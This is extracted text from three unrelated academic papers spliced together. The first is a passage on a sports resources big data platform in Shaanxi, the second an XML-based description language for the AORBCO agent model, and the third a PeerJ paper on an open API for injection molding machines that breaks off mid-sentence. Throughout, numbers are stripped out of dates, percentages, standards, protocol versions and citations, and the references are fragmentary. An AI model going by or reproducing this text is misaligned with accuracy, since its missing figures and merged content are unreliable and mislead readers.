advance to further clarify the platform business framework. the business on sports resources information big data platform in accordance with the occurrence of the object can be divided into: management department-to-management department, management department-to-business and business-to-business users. there are many sources of information on sports resources, which can be divided into internal systems of management departments and external systems of management departments. the internal systems of management departments include: track and field training center, stadium management committee, sports industry group co., ltd., stadiums, sports service guarantee center, etc.; external systems include: sports facilities of enterprises and institutions, fitness centers organized by social forces. we shall build a sports resources information big data platform and tap existing sports resources data to provide support and services for various applications that require sports resource data. c. construction of sports resources information big data platform based on the sports resource information of relevant agencies such as the sports management department, enterprises and institutions and the fitness center held by the social forces, the big data platform of sports resources information, through the mining of data, provides support for the sports resources information applied in the management department, the relevant units and individuals based on sports resources information sharing mechanism. ) framework of sports resources information big data platform the data platform shall comply with the construction standards and the basic requirements for protection of security level of information systems (people's republic of china national standard gb/t - ) and shall be constructed by the infrastructure, big data system and big data application system. standard system: a scientific and feasible standard system is a key factor for the successful construction of a big data platform for sports resources information. we shall establish the "sports resources information big data platform expert committee", and the expert committee shall develop data platform technical standards, management standards and safety regulations. security: security system is the lifeline of the big data platform of sports resources information. we shall make full use of the technical features of big data platform to prevent illegal invasion and vulnerability attacks and strengthen the establishment of security clearance system with virus clearing and access setting as the core so as to ensure the data security and system security of the sports resources information big data platform. infrastructure: the construction of a big data platform for sports resources information requires the existing sports resources information of sports management departments, sports institutions and enterprises and fitness centers organized by social forces, and needs to collect real-time data from these departments. the stable, reliable and secure network channel, powerful hardware and software systems are the necessary conditions for the completion of data collection and integration. we should further increase the intensity of infrastructure construction, optimize the network system, upgrade and update the computer hardware and software equipment, and lay a solid material foundation for the big data platform. big data system: sports resource information big data system includes support data, data exchange and integration system, catalog management system, operation and maintenance system. the data exchange and integration system will be distributed in different business systems, diversified data collection, cleaning, exchange and integration and other operations. the processed data is then stored by the catalog management system. big data application: big data application system is the core of big data platform of sports resource information and also the key to realize various applications. the platform can provide various types of big data services to sports management departments, enterprises and public institutions, fitness centers and individuals. for example, the sports administration department monitors the sports stadiums in real time; the user reserves the venue through the terminal according to the stadium distribution and the number of real- time users; and the user reserves the courses online according to the contents and time of the coach. international conference on sensor network and computer engineering (icsnce ) d. design of sports resources information big data platform the sports resources information big data platform includes: support data, data exchange and integration system, catalog management system, operation and maintenance management system, interface system and platform system. the structure of sports resources information big data platform is shown as in figure . figure . structure of sports resources information big data platform ) support data the support data can effectively connect sports resources information big data platform and sports resources database, and also can support the normal operation of other systems. it mainly contains metadata, exchange data, directory data, management data and security data. the metadata, also known as the intermediary data, is the information about the organization of the data, the data fields and their relation. in short, the metadata is the data about the data; the exchange data is generated during the data exchange, which includes node data, parameter management information, etc .; the directory data is mainly the directory information of sports information resource; the operation and other information generated by the operation and maintenance system collectively referred to as management data; the system failure frequency information and system security analysis data that record security situation of sports resources information big data platform becomes safety data. ) data exchange and integration system the data exchange is based on a unified network and exchange protocol to achieve the exchange of information on sports resources between the relevant departments, avoid data chaos and repeat in the process of running exchange so as to achieve the synchronization of sports resources information and ensure data stability and security. the data exchange business model is shown in figure . figure . data exchange business model the main function of data integration is collecting, cleaning, exchanging and integrating the sports resource information data dispersed in various departments, re- analyzing the data collection for relevance and causality and digging data deeply to form new and more valuable data resources. data integration service system includes modules of integrated configuration, component management, process management and integration results information query. the integrated configuration module is used for dynamically configuring and integrating rules. the component management module is used to package data cleaning, conversion, alignment and splitting. the process management module is used for process management of various processes in the integration and implementation process; the integrated result information query module is used to provide query and statistics of the data integration results. the data integration business model is shown in figure . figure . data exchange business model ) catalog management system the catalog management system achieves its functionality through three subsystems like cataloging, transmission, management and service. catalog system finishes metadata assignment and generates the contents of the directory in accordance with predetermined standards; international conference on sensor network and computer engineering (icsnce ) directory transmission system completes the transmission of the directory contents between databases; directory management and service system realizes directory content audit, query, publishing and other functions. ) operation and maintenance management system the o&m management system realizes the daily operation and maintenance and the security of big data platform of sports resource information. the main functions are as follows: user management: this function is mainly used to distinguish between the providers, managers and users of sports resource information, and users with different identities have different permissions; resource management: this function is mainly used for the management of metadata, with the query function; application management: this function is mainly used for reviewing and sorting out the distributed sports resource information, and charging the released information of paid sports resources; security maintenance and management: realizing such functions as user identity authentication, data encryption and transmission, real-time data backup, and recording daily access status and fault information. ) interface system the interface system is a channel for developers to call sports resource information. with this channel, developers can integrate the service of the platform with their own existing applications and directly develop the big data platform of sports resource information. ) platform system the running window of sports resources information big data platform is the platform system. the platform system is user-oriented, providing support services according to different needs, which is used for a variety of platform-based applications in order to achieve the construction of sports resources information big data platform. iv. performance evaluation of sports resources information big data platform the objective evaluation of sports resources information big data platform is to master the use of sports resources information, improve the utilization of sports resources, further promote the development of sports informatization and improve the physical fitness of the people. the selection of performance evaluation indicators should be clear and easy to operate, combining qualitative indicators with quantitative indicators, establishing a performance evaluation index system that objectively reflects the big data platform of sports resources information, and scientifically evaluating the big data platform of sports resources information. v. conclusion the big data platform for sports resource information covers such big data as investment in sports resources, costs, prices and benefits, involving sports management departments, enterprises and institutions, and fitness centers organized by social forces. through the data cleaning, mining and other operations to sports resource information and based on the sports resource information sharing mechanism, the platform can provide the support of sports resource information applications. problems such as unbalanced distribution of public sports resources, dislocation of supply and demand of sports resources and informatoin asymmetry of supply and demand of sports resources must be solved technically and the pace of sports information construction in china shall be accelerated to further enhance the national physique. acknowledgment subject: routine subject of sports bureau of shaanxi province in : big-data-based research on integration and application of sports resource in shaanxi province (project no. ); annual university-level research project of xi'an siyuan university in : planning and research on campus card system(project no.xasy-b ). references [ ] [ ] china state council, action program for big data development, [eb/ol] .http: //www.gov.cn/zhengce/content/ - / /content_ .htm, august , . (references) [ ] qu haixu, zhang hujun and cui haiqing, development and application of production and operation simulation system of oil company based on big data [j]. [ ] zhang jingbo, research on the improvement of computer network reliability under the background of "internet+" [j] .journal of liaoning higher vocational technical institute, vol. ( ), pp. - , . [ ] general administration of sport of china, national fitness program ( - ) [eb/ol] .http: //www.sport.gov.cn/n /n /c /content.html, august , . [ ] general administration of sport of china, " th five-year plan" for sports development, [eb/ol] .http: //news.xinhuanet.com/sports/ - / /c_ .htm, august , . [ ] liu liang and wang hui, dispelling and reforming ways of supply and demand contradictions of public sports resources in china from the perspective of supply-side reform [j]. journal of wuhan institute of physical education, vol. ( ), pp. - , . paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) research on aorbco model and it's description language zhi min school of computer science and engineering xi’an technological university xi’an, china e-mail: jaja @qq.com luo junmin school of computer science and engineering xi’an technological university xi’an, china e-mail: robertjm@ .com gao wuqi school of computer science and engineering xi’an technological university xi’an, china e-mail: gaowuqi@ .com abstract—this paper improves the aorbco model based on the four characteristics of intelligence- self conscious, mutual representation, fuzziness and dynamics, and designs a description language of aorbco model. the language describes the self-consciousness of an agent with its’ five components-belief, desire, ability, planning and behavior control mechanism. the components of entities including acquaintances of an agent and objects known by the agent are as the starting point to characterize the mutual representation of intelligence. introducing and updating of the weights to express the closely degree of relationship among entities are to simulate the fuzzy of intelligence. the behavior control mechanism of the agent makes the intelligent dynamics realization. the aorbco description language based on xml makes the expression form and content of the resources unify through the definition of correlative marks, which is convenient for people and computers to understand the semantics of language components. the essence of space and time is also revealed in this paper. keywords-aorbco; intelligent mode; agent; self- consciousness; description language i. the introduction the aorbco model was proposed in the literature[ ]. its purpose is to unify the concepts of ontology in philosophy and computer science so that the expression form and content of the resources are combined organically. in the literature[ ], the author try to unified the intelligent models of the three schools of artificial intelligence as an integrated intelligent model. however, through the study of literature[ , and ], it is known that intelligence not only has the characteristics of mutual representation, fuzziness and dynamism but also more self-awareness. the concept of ontology in philosophy refers to the origin of things, the origin is invisible and incomprehensible, and everything is just the manifestation of ontology[ ] . people in computer science field uses the concept of ontology to formally define the terms used in a certain field and their relationship[ ]. it is actually just a formal definition of domain knowledge only. therefore, we think it is better not to use the concept of domain knowledge in the field of computer science, but rather to ensure the sacredness of the concept of ontology in philosophy and better understand the connotation and relationship of related concepts in computer science. based on the above research, especially with the improvement of the original aorbco model based on the intelligent self-awareness, this paper proposes aorbco intelligent model with agent as the core, simulates human's thoughts and behaviors , and makes the agent imitate human's behavior model to deal with the information in order to achieve the automatic update and evolution of knowledge to make the agent more intelligent. at the same time, the aorbco description language is designed for the model, and its description form and language structure are more in line with the new aorbco intelligent model[ , ] expression needs.. ii. a formal description of aorbco in our real life, human beings seem to live in the same world, but if you analysis carefully you can find that each person is an independent individual and has a different worldview. each people are individuals observe from your own perspective. for each individual, the world exists in his own understanding, and it is impossible for an individual to jump out of his field of vision to see other people's "world". this is what people often say the "one person, one world". individuals in the observing the surrounding environment and communicating with other individuals at the same time, in this process we will modify our own understanding of the concepts and its relationship, and then through self- understanding to form new ideas or new abilities; in many individual exchanges and communication we will build a common view of things and awareness, that is, domain knowledge - knowledge system based on consensus[ ]. we want to simulate this process of knowledge formation and updating in the computer world, simulating human intelligence through an agent in the aorbco intelligent model, which consists of five components of belief, desire, ability, planning, and behavior control mechanisms, defined as follows: mailto:robertjm@ .com mailto:gaowuqi@ .com international conference on sensor network and computer engineering (icsnce ) definition : subject, agent assume: a(t) denote the agent's cognition of its own state at time t, aa represents the set of acquaintances recognized by the agent; oa represents the set of objects known by the agent; ra represents the set of relations recognized by the agent; h (t) represents the set of work completed by the agent before time t,namely the historical operation set of agent; d (t) represents the agent's desire at time t; p (t) represents the set of work to be done at time t, namely, the plan of agent to realize the current wish; behavior_controller represents the agent's behavior control mechanism; a(t)=(aa, oa, ra, h(t), d(t), p(t), behavior_controller) t is what we usually say time, its essence is the order of the agent in different states (that is, what we call the space) . definition : acquaintance subject, acq-agent assume: aa (i, t) denote the agent's cognition of acquaintance subject's state at time t, aa(i, t)  aa. “i” represents the name or number of the subject of an acquaintance, especially the subject of an acquaintance. aaa represents a acquaintance subject's(acq-agent.i) acquaintance set; oaa represents a set of objects known by acq-agent. i; raa represents a set of relations perceived by acq-agent.i; h(i, t) represents a set of work to be done before time t,namely the historical operation set of acq-agent. i; d(i, t) denotes the desire of acq-agent. i at time t; p(i, t) denotes the set of actions to be performed by acq-agent. i at time t, namely, the plan of acq-agent. i to realize the current wish; then: aa(i, t)=(aaa, oaa, raa, h(i, t), d(i, t), p(i, t)) he description of aaa, oaa, raa, h(i, t), d(i, t), p(i, t) correspond to aa, oa, ra, h(t), d(t) and p(t) in agent respectively, their formal definition is similar too. definition : object, object assume: o (i, t) represents the state of the object (object.i) which the agent knows at time t, o (i, t) oa. oo represents the set of objects related to object. i in the agent's cognition, oo⊆oa; ao represents the set of agents which are related to object. i, ao⊆ aa; ro represents the set of relations related to object. i , ro⊆ra. o(i, t)=(ao, oo, ro) definition : relationship, ra assume: r (ei, ej, t) represents the cognition of the subject at time t,r(ei, ej, t)∈ra;ei, ej denotes agent or object, and id is the relationship name; ra represent the degree of closeness, the value range [ , ]; ri represent instantaneous relationship, the value is or ; ra = Σri / t. then: ra(ei, ej, t)=(id, ri, ra),if ri is , ei, ej has no relationship named id at time t; if ra(ei, ej, t) is empty, ei and ej have no relationship. definition : history, h(t) assume:work means the operation or sequence of operations that subject has performed. then: a(t ) work a(t )∈h(t),t <t <t a (t ) work a (t ) represent the agent is from the state a (t ) to state a (t ) by executing the action. definition : desire, d(t) assume: work represent a operation or a operation sequence that subject planed to achieve the desired.then: a(t ) work a(t )∈d(t) ,t<t <t 或 t <t<t definition : plan, p(t) assume: work indicates the sequence of actions or operations to be performed by subject. then: a(t) work a(t )∈p(t),t<t definition : behavior control mechanism, bc u-agent indicates the user body or user, then bc could be described like this: t=t ; initialize a(t ); while(d(t)≠null) { if (a(t)could generate w(t)) { generate p(t) and execute it; t=t+δt; } else consult u-agent; } iii. definition of aorbco description language in order to make the aorbco model practical, the bnf definition of its description language is given. in this description language ,type is used to represent types, which are basic data types and user-defined classes; val represents an object itself; weight represents a number between ( , ); suffixes with _name are identifier; and define these keywords: agent, belief, act, desire, plan, behavior_controller, acq_agent, acq_object, acq_class, acq_bbelief, acq_aact, acq_ddesire, acq_pplan, address, acq_aagent, acq_oobject, acq_cclass, member ship formula, precondition, post condition, parameter (the keyword in the definition is in bold.), arguments, its semantics will be introduced in the fourth part. table i. the symbols used in bnf definitions are as follows symbols definitions :: = "defined as" meaning [ ] there are optional {} there is a collection | the content on the left and right sides is optional terminator in bold non-terminal in normal fonts  subject::=<agent agent_name> beliefset abilityset desireset planset behaviorcontrol </agent agent_name> international conference on sensor network and computer engineering (icsnce )  beliefset::=<belief [/] >[acquaintancesubjectset  cognitiveobjectset cognitiveclassset</belief>]  abilityset::=<act [/] > [{ability}</act>]  desireset::=<desire [/] >[{desire} </desire>]  planset::=<plan [/] > [{plan} </plan> ]  behaviorcontrol::=<behavior_controller>controlfu nction</behavior_controller>  acquaintancesubjectset::=<acq_agent [/]>[{acquaintancesubject}</acq_agent>]  acquaintancesubject::=<agent_name>  weight acquaintancebeliefset acquaintanceabilityset acquaintancedesireset acquaintanceplanset communicationinterface</agent_name>  cognitiveobjectset ::=<acq_object [/]>[{object}</acq_object>]  object::=<object_name> {objectattributes}</object_name>  cognitiveclassset::=<acq_class [/]>[{class}</acq_class>]  class::=<class_name>weight {classattributes} membershipcalculationformula</class_name>  ability::=<action_name [/] >[precondition postcondition parameterlist  actionbody</action_name >]  desire::= <desire_name [/]>  [logicexpression</desire_name >]  plan::=<desire_name [/]>  [{<action_name>argumentlist</action_name>} </desire_name>]  acquaintancebeliefset::=<acq_bbelief[/] >[subject setofacquaintance  objectsetofacquaintance  classsetofacquaintance  </acq_bbelief>]  acquaintanceabilityset::= <acq_aact [/] >[{acquaintanceability}</acq_aact>]  acquaintancedesireset::=<acq_ddesire [/] > [{desire} </acq_ddesire>]  acquaintanceplanset::=<acq_pplan [/] > [{plan}</acq_pplan>]  communicationinterface::=<address uri/>  subjectsetofacquaintance:=<acq_aagent [/]>[{<agent_name/>}</acq_aagent>]  objectsetofacquaintance::=<acq_oobject [/]>[<object_name/>}</acq_oobject>]  classsetofacquaintance::=<acq_cclass [/]>[{<class_name/>}</acq_cclass>]  acquaintanceability::=<action_name [/] >[precondition postcondition parameterlist</action_name>]  objectattributes::=< attr_name >type:val;weight</attr_name>  classattributes::=<attr_name> type: weight </attr_name>  membershipcalculationformula::=  <membershipformula>  functionexpression  </membershipformula>  precondition::=<precondition> logicexpression </precondition>  postcondition::=<postcondition> logicexpression </postcondition>  parameterlist::=<parameter [/] > [{parameter_name : type;} </parameter>]  argumentlist::=<arguments [/] > [{arguement_name : val;} </arguments>]  actbody::=<body>function</body> iv. prepare your paper before styling the aorbco description language describes the aorbco intelligence model in a way that unified expression of content and form ( semantics and grammar), which intent to define the language components that both humans and computers can understand. mutual representation is one of the characteristics of intelligent systems, that is, any thing describes itself through the relationship with other things. the aorbco description language uses the syntax of xml with the form:<tag>...< / tag> , that is ,the label's semantics are defined by its component "...", and its components may have other labels in turn, so that the system has an intelligent mutual representation, it shows the complex relationship between the concept. fuzziness is another characteristic of the intelligent system, that is, the degree of the closeness of the relations among things is different. the aorbco description language is explicitly represented by the weight. in addition, the description of the acquaintance of the subject and the acquaintance of the acquaintance in the model is difference in detail. it is also an implicit expression of fuzziness. evolution refers to subject in the system adjust constantly the relationship between subject and object. the mutual representation of things is the premise of fuzziness, and the fuzziness changes with the operation of the system, so that the whole model is in an evolving dynamic. a. description of the agent aorbco model is based on the idea of "one person, one world" to build a self-aware intelligent model centered on the agent. through the analysis of the composition of human self-awareness [ ] , we divide the agent into five parts: belief, act, desire, plan, behavior_controller. belief is the agent's description of the entity it knows and entities' relationship. we hope to express the "worldview" that the agent possesses through belief, that is to say, agent's view of the world. ability means the function that an agent can do. desire is the target state they hope to achieve. planning is an ordered set of capabilities that are chosen to fulfill their desire. behavior control mechanisms enable the above components to form an organic whole. the description of the agent is as follows: <agent name> <belief/> <act/> <desire/> international conference on sensor network and computer engineering (icsnce ) <plan/> < behavior_controller /> </agent name> b. description of the belief belief is description of the entity agent knows and its relationship. entities are divided into two categories: one is subject, an active acquaintance principal; another is a passive object. there are two kinds of relationship between entities. the description of the belief is shown below: <belief> <acq_agent/> <acq_object/> <acq_class/> </belief> ) description of the acquaintance subject <acq_agent /> represents an acquaintance subject set, which is the mapping of other subjects that are related to the agent.acquaintance subject have their own beliefs <acq_bbelief/>, abilities <acq_aact />, wishes <acq_ddesire/>, planning <acq_pplan/>, which are not described in detail,expect the mechanism of behavior control. in addition, the acquaintance also added the communication interface <address />, using uri as the only one address identifier. each agent have a special subject of acquaintance, that is, himself. in the acquaintance's belief, using <acq_aagent/>, <acq_oobject/> and <acq_cclass/> describe the acquaintance subject's acquaintance, objects and classes. the specific form is as follows: <acq_agent> <agent_name> weight <acq_bbelief> <acq_aagent/> <acq_oobject/> <acq_cclass/> </acq_bbelief> <acq_aact/> <acq_ddesire/> <acq_pplan /> <address uri/> </agent_name> …… <acq_agent> weight refers to the degree of intimacy between acquaintance subject and agent. ) description of the object <acq_object/> represents the set of objects that the agent knows, and <object_name/> represents an object in the set of objects and consists of the attributes of the object. object attributes are other objects related to this object; object attributes is composed of the object attribute name <attr_name/>, the attribute type, the attribute value and weight. in fact, the external form of the subject exists in the form of the object, which is called the subjectivity of the subject. to represent the subjectivity of the subject, a special kind of object is designed to describe the characteristics of the corresponding subject, which represent the subjective perception of the object or an acquaintance. the specific description of the object is as follows: <acq_object> <object_name> <attr_name>type:val;weight</attr_name> ...... </object_name> ...... </acq_object> ) description of the class in this paper, the model is divided into specific and abstract relationship, the specific relationship is reflected in the description of each element. described in <acq_class/> is the abstract relationship, which is the subject of object classification, including two: one is the agent's classification of the object it currently knows; the other is the agent's classification of acquaintances it knows. the classification of the acquaintance subject is based on the subject's objectivity mentioned above, so we use the same description of the object class here. each class include parts: class name <class_name/>, class attribute list, class membership calculation formula <membershipformula/>, and membership threshold weight. the class attribute indicates characteristics which the object belong to this class should have, including attribute name <attr_name />, data type and weight (weights and thresholds are expressed in weight)which means how important this attribute is in the class. the class membership degree calculation formula is based on the class attribute features to calculate the degree of object belonging to the class, the value range ( , ), membership threshold is used to specify the minimum membership value belongs to the class. the specific description is as follows: <acq_class> <class_name> <attr_name> type:weight </attr_name> …… <membershipformula/> weight </class_name> …… </acq_class> c. description of the ability <act /> here represents the set of capabilities of the agent, including several specific capabilities. each act consists of capability name </action_name>, precondition </ precondition >, post-condition </postcondition>, formal parameter list <parameter /> and action body <body />. the precondition indicates the condition that the parameters related to the action should satisfy before the action is executed. the post-condition indicates the condition that the parameter related to the action should satisfy after the action is executed. the action body is a specific execution process. the specific description of the ability is as follows: <act> <action_name> <precondition/> <postcondition/> international conference on sensor network and computer engineering (icsnce ) <parameter/> <body/> </action_name> …… </act > d. description of the desire <desire /> indicates that the target state set of the agent contains a number of specific wishes, which is the main motivation of the agent's behavior. <desire_name/> represents one of the wishes that represent the state the agent wants to reach or maintain. these aspirations may be user agent commands or requests from other agents, or the distance between changes in the environment and hold. the realization of the wish is to make the corresponding plan through the planning function in the behavior control mechanism. during the execution of these plans, there may be changes in belief or ability to achieve the desired goal. a detailed description of the wishes is as follows: <desire> <desire_name/> …… </desire> e. description of the plan <plan /> is the best set of action sequences that the agent can make at present according to the agent's ability. each plan consists of a desire name <desire_name/> and an action list, each composed of <action name> and an actual argument list <arguments />. <desire_name/> represents a plan for desire. the detailed description of the plan is as follows: <plan> <desire_name> <action_name> <arguments/> </action_name> ...... </desire_name> ...... </plan> f. description of the behavior control mechanism <behavior_controller/> is the behavioral control mechanism of agent. it modifies its own beliefs and forms a wish through the perception of the environment, which is planned and implemented by the desire, according to its own ability or through interaction with acquaintances. in the process of implementation, it modify its beliefs and abilities and organize the other parts to make agents self-aware. v. conclusion in this paper, the original aorbco model is improved to form a new aorbco intelligent model with agent as the core, which can describe intelligent self-awareness, mutual representation, fuzziness and dynamics more accurately; based on xml, the definition language of aorbco intelligent model is defined so that the expression content and form of resources are unified so that people and computers can understand the semantics of language components. the behavior control mechanism in aorbco model integrates the agent's beliefs, abilities, wishes and programs into one. it is the core of simulating human self-learning, interaction and collaboration, planning decision-making and execution control. it will become the focus of our research in the future. acknowledgment support project of shaanxi provincial science and technology department ( gy- ); the special scientific research project of the shaanxi provincial education department ( jk ); new network and detection control national local joint engineering laboratory fund project (gsysj ) references [ ] luo junmin, zheng shouqi, zhong lianjiong. ontology and aorbco model [j]. microelectronics and computer,vol. , ( ):pp. - . [ ] luo junmin, zheng shouqi. intelligent and intelligent model [j]. computer engineering and application, , vol. ( ):pp. - . [ ] luo junmin, wu yuyun, wu bin. fuzzy ontology and its evolutionary research [j]. microelectronics and computer, , vol. ( ):pp. - . [ ] luo junmin, wang lei. research on the dynamic ontology architecture based on the interaction [j]. microelectronics and computer, , vol. ( ):pp. - . [ ] luo junmin, li junwei. research on agent self-consciousness [j]. microelectronics and computer, , vol. ( ):pp. - . [ ] xiao kunshou, li de-shun, ontology. encyclopedia of china, vol. Ⅰ philosophy. - [ ] feng zhiyong, li wenjie, li xiaohong. ontology engineering and its application. beijing: tsinghua university press. . . [ ] bratman, m.e. ( ) [ ]. intention, plans, and practical reason. csli publications. isbn - - - . [ ] ring m, orseau l. machine learning in an agent: a generic model and an intelligent agent -based on inductive decision learning [j]. journal of artificial intelligence, , vol. ( ) : pp. - . [ ] taixu. jurisprudence [m]. business press, . [ ] nils.nilsson (author), wang fei, zhao xueliang (translator). understanding faith. mechanical industry press. . . [ ] gasser l, braganza c, herman n. chapter -- mace: a flexible testbed for distributed ai research[j]. distributed artificial intelligence, :pp. - . [ ] sun shengtao, lu jiasheng. self-consciousness and its research overview [j]. psychological exploration, , vol. ( ): pp. - . https://en.wikipedia.org/wiki/center_for_the_study_of_language_and_information https://en.wikipedia.org/wiki/international_standard_book_number https://en.wikipedia.org/wiki/special:booksources/ - - - submitted march accepted september published november corresponding author olga ogorodnyk, olga.ogorodnyk@ntnu.no academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright ogorodnyk et al. distributed under creative commons cc-by . open access towards a general application programming interface (api) for injection molding machines olga ogorodnyk , mats larsen , ole vidar lyngstad and kristian martinsen department of manufacturing and civil engineering, norwegian university of science and technology (ntnu), gjøvik, norway sintef manufacturing, raufoss, norway abstract injection molding is a complicated process, and the final part quality depends on many machine and process parameters settings. to increase controllability of the injection molding process, acquisition of the process data is necessary. this paper describes the architecture and development of a prototype of an open application programming interface (api) for injection molding machines (imms), which has the potential to be used with different imms to log and set the necessary process parameter values. at the moment, the api includes an implementation of emi data exchange protocol and can be used with engel imms with cc and rc controllers. data collection of up to machine and process parameters (the number might vary depending on the type of machine at hand), obtained from sensors installed in the machine by the manufacturer is allowed. the api also includes a module for the acquisition of data from additional d party sensors. industrial raspberry pi (revpi) was used to perform analog-to- digital signal conversion and make sensors data accessible via the api prototype. the logging of parameters from the machine and from sensors is synchronized and the sampling frequency can be adjusted if necessary. the system can provide soft real-time communication. subjects real-time and embedded systems, scientific computing and simulation keywords application programming interface (api), data acquisition system, injection molding, open source, industry . , cyber-physical systems introduction manufacturing systems gradually become more sophisticated due to an increasing demand on quality of manufactured products, production system performance, as well as economic profitability (yin et al., ). therefore, data acquisition, process monitoring and control are becoming more and more important in the manufacturing industry (negri, fumagalli & macchi, ). a significant number of studies stress the importance of collection and analysis of data from different manufacturing processes and injection molding is no exception (vrabič, kozjek & butala, ). the concepts of industry . and cyber-physical systems (cps) are important drivers for this development. it is becoming increasingly common to demand machine tools equipped with sensors from the machine tool manufacturers, and later to add sensors from the d party sensor suppliers. appropriate sensors in machine tools, dies and molds can provide how to cite this article ogorodnyk o, larsen m, lyngstad ov, martinsen k. . towards a general application programming inter- face (api) for injection molding machines. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:olga.ogorodnyk@ntnu.no https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. useful information such as temperature and pressure, while communication protocols, e.g., mtconnect and opc/ua allow the recording of the necessary controller signals (lee, kao & yang, ). using data acquired from these sensors can assist quality control routines and could establish models for suggestion of optimal process parameters (zhao et al., ), decrease scrap rates and energy usage through the elimination of production cycles that produce defect parts and minimize unwanted ‘‘manual adjustments and variations on product quality’’ (saldivar et al., ). before the start of the production of an injection molded part, parameter values such as holding pressure, backpressure, cooling time, injection speed, screw speed and others need to be set. these parameter settings influence the part quality, and erroneous parameter values might cause various defects (zhao et al., ; ogorodnyk & martinsen, ). to aid the operation of the imms, many suppliers offer manufacturing execution systems (mes), which include data logging functions. these systems can be more or less complicated, although they will usually provide such functions as monitoring of machine status, remote access to machine set-up, data logging of machine and process parameters and displaying the data in a feasible way. examples of such systems are tig’s authentig (tig. tig authentig, ), arburg’s host computer system (als) (arburg. host computer system , als), kraussmafei’s maxecution (kraussmaffei. maxecution, ), mes hydra (mdpv. manufacturing execution system hydra, ), sap manuacturing execution (sap. sap manufacturing execution, ) and polmak plastik qmaster (polmak_plastik. polmak plastik products, ). there are, however, challenges for the usage of these systems for analysis and research purposes. . they are rather costly and often compatible only with newer generations of imms and imm controllers. . it might be hard to synchronize data logging from machine built-in sensors with logging of data from d party sensors installed in the mold. . the mes systems often log data only once per production cycle and this might lead to missing information about the process dynamics and peak values of process parameters. . commercially available mes software has a closed architecture that does not always allow to access all the machine and process data of interest, this might be an obstacle in terms of research and advanced process data analysis. therefore, in this article a question of how to design a universal api to control and monitor injection molding for the next generation industrial systems is discussed. a prototype solution of an open api that allows interaction with imm’s control unit is presented and made available through the following repository: https://github.com/sintefmanufacturing/ imm_api. the prototype allows collection of production data through emi data exchange protocol and can be built on to add support for other imms or new data collection functionality. ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/sintefmanufacturing/imm_api https://github.com/sintefmanufacturing/imm_api http://dx.doi.org/ . /peerj-cs. figure research methodology steps. full-size doi: . /peerjcs. /fig- background and requirements to the proposed api the described study is based on four main steps shown in fig. . at first, a problem and requirements analysis was conducted. this included review of several available manufacturing execution systems, communication protocols used for connection of imms to other devices, as well as studies related to the development of similar systems by academia. in addition, the stakeholders’ needs and requirements for an imm api were identified. the primary stakeholders in this case are the companies and research institutions participating in the project, while potential stakeholders include the imm manufacturers, other injection molding companies and researchers. the second step was dedicated to summarizing which models and frameworks are to be used to develop the proposed api prototype and creation of the implementation schemes of the system (uml diagrams). the third step included development of the prototype. in the final step, the system was tested with different sampling frequencies to assess its performance. injection molding process injection molding is one of the most widely used processes for production of polymeric products, as about % of them are manufactured using this process (osswald & hernandez-ortiz, ). it is a cyclic process for production of identical parts through injection of molten material into a mold cavity of a desired shape (zheng, tanner & fan, ). its main advantage is an ability to fabricate high volumes of parts of various sizes and geometries, from the smallest components (micro-injection molding) to entire car body panels. the reciprocating screw imms are mostly used for production of the injection molded parts. their main components are a hopper, a rotating screw, a heated barrel and a clamping unit consisting of a mold typically made of two halves. an injection molding cycle usually includes the following phases: plasticization, injection, packing, cooling and ejection (zheng, tanner & fan, ). during the plasticization stage ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. plastic pellets are fed into the heated barrel through the hopper. here they are melted, mixed and homogenized with help of the reciprocating screw. when enough plastic melt is accumulated, the screw moves forward and forces the molten material into the mold cavity at high velocity and pressure (injection phase). when the mold cavity is – % full, the process switches from the constant velocity to the constant pressure control to avoid pressure spikes. at the point, when the cavity is completely filled, the packing stage starts: the screw stays in the forward position or keeps moving with a small displacement to maintain the necessary holding pressure. the material cools down and shrinks allowing another small portion of the material to enter the cavity. this stage continues until the material in the cavity entrance solidifies. next, the holding pressure is reduced to a value close to zero and the part continues to cool down and solidify (cooling) until the mold is opened and the part is ejected (ejection). to achieve a repeatable process that allows production of high quality parts with specific material properties, a significant number of machine and process parameters need to be considered. many of them, however, are dynamic, and adopt a characteristic curve over the production cycle. examples of such parameters are screw speed, rotation speed, material cushion, mold temperature and pressure, etc. most of these parameters can be acquired from the imm sensors installed by its manufacturer, however, some require additional sensors in the molds, as for example, the mold temperature and pressure data. this data is suggested as one of the essential indicators of production of the high quality parts, as it reflects the evolution of the polymer conditions inside the mold, and is used and investigated by both industry and academia (zhao et al., ; kurt et al., ; kurt et al., ; ageyeva, horváth & kovács, ). there are a number of sensors available on the market for installation in molds (piezoelectric/piezoresistive, strain gage, surface mounted thermocouples, ultrasonic sensors, optical sensors, etc.). some of them have operating temperatures that do not allow insertion into the mold cavity and touching the molten material (indirect, contact-free measurement), while others are able to operate in these extreme conditions (direct measurement) (ageyeva, horváth & kovács, ). the frequencies for logging the imm and mold data may differ depending on the further use of this data, as well as on the size of the produced part. for example, if a part is manufactured using micro-injection molding and its cycle time is equal to a couple of seconds, a higher logging frequency might be of interest, however, if a bigger part is produced and the cycle time is longer the frequency of interest might be lower. commercially available mes and solutions proposed by academia mes are computerized systems used in manufacturing to obtain the necessary data from the production floor in order to optimize the production output (mahmoud et al., ). a suitable data exchange protocol needs to be utilized to establish communication between an imm and an mes or a pc. currently, the most widely used protocols are euromap and euromap . euromap was developed in and uses file- based data transfer (euromap, ). euromap was released in and is based on opc/ua to be applied in industry . cases. euromap ’s downside is that it is not directly connected to the imm’s control loop and thus it might not be able to guarantee ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. real-time or soft real-time communication. another example of a data exchange interface is engel machine interface (emi). emi is directly connected to the machine’s control loop via ethernet (tcp/ip protocol) and communication is based on xml byte streams. emi is much faster in comparison to euromap , as emi exchanges data approximately every . s, while euromap exchange period is - s, based on the authors’ experience. there exist a significant number of manufacturing execution systems applicable to injection molding. table shows functionality in terms of the 